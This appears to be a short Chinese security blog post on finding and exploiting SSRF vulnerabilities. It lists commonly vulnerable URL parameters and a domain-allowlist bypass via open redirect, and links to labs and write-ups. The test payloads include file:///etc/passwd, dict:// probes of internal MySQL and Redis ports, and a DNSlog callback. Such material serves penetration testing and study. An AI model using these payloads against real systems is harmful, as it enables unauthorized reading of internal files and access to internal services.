文章总结： 本文介绍了SSRF漏洞的挖掘与利用方法，包括常见参数(api、url、callback等)、测试值(百度URL、DNSlog、dict协议等)以及绕过限制的技巧。文章列举了SSRF可能出现的10种常见场景，如网页分享、转码服务、图片加载等，并提供了多个相关资源链接。对于安全研究人员和渗透测试人员，本文提供了实用的SSRF漏洞检测和利用指南，特别是在绕过域名限制方面的技巧很有参考价值。 综合评分： 75 文章分类： 漏洞分析,WEB安全,渗透测试

SSRF挖掘与利用

进击的HACK

进击的HACK

2025年10月14日 07:50 江苏

声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途给予盈利等目的，否则后果自行承担！如有侵权烦请告知，我会立即删除并致歉。谢谢！

文章有疑问的，可以公众号发消息问我，或者留言。我每天都会看的。

字数 389，阅读大约需 2 分钟

SSRF常出现的参数

api=
callback=
data=
dest=
dir=
domain=
feed=
file=
host=
html=
image=
imgsrc=
next=
o=
out=
page=
port=
redirect=
reference=
return=
site=
url=
val=
validate=
view=
window=
name=

测试value

https://www.baidu.com
http://xxxx.dnslog.cn
dict://127.0.0.1:3306
dict://127.0.0.1:6379
file:///etc/passwd

绕过限制

只允许访问指定域名

比如，信任aaa.com

?imgsrc=http://aaa.com

我们可以在aaa.com寻找任意URL跳转，让网站隔一层访问到目标网站

?imgsrc=http://aaa.com?url=http://target.com:80

SSRF靶场

国光的手把手带你用 SSRF 打穿内网靶场源码 https://github.com/sqlsec/ssrf-vuls WP：https://forum.butian.net/share/133

常见场景

1. 1. 通过URL地址进行网页分享
2. 2. 转码服务，通过URL地址把原地址的网页转换格式
3. 3. 图片加载与下载，一般是通过url参数进行图片获取
4. 4. 未公开的api实现以及其他调用url的功能
5. 5. 设备后台管理进行存活测试
6. 6. 远程资源调用功能
7. 7. 数据库内置功能
8. 8. 编辑器进行远程图片抓取，如: ueditor
9. 9. 打包附件或者内容编辑并导出时
10. 10. PDF生成或导出

PDF生成或导出

• • 从PDF导出到SSRF https://mp.weixin.qq.com/s/ZfyJgZbuw58qK7TjjKEdmg
• • 文件导出功能的SSRF https://forum.butian.net/share/1497

SSRF挖掘

• • SRC中的SSRF漏洞挖掘笔记1.0 https://xz.aliyun.com/news/11673
• • 从CVE-2025-1548 学习图像上传功能挖掘之SSRF https://xz.aliyun.com/news/17028

SSRF利用

• • 云上攻防打点之SSRF到主机接管 https://xz.aliyun.com/news/14073
• • 云上的ssrf利用 https://forum.butian.net/share/2412
• • Facebook SSRF https://mp.weixin.qq.com/s/D0Uj4r-UZWsDiPMRlALeww

参考资料

• • ssrf漏洞结合redis渗透linux主机 https://mp.weixin.qq.com/s/SqqatiTFfO-v4GItnizEUg
• • AI智能体平台白盒审计思路（SSRF篇）https://mp.weixin.qq.com/s/RDK86WArqL1sf0QZILarWw
• • https://infosecwriteups.com/from-open-redirect-to-internal-access-my-ssrf-exploit-story-10a736962f98
• • SSRF总结 https://mp.weixin.qq.com/s/g6Eycocmgq9g2azCnEScXQ

欢迎加入知识星球，领取优惠券

查看原文：《SSRF挖掘与利用》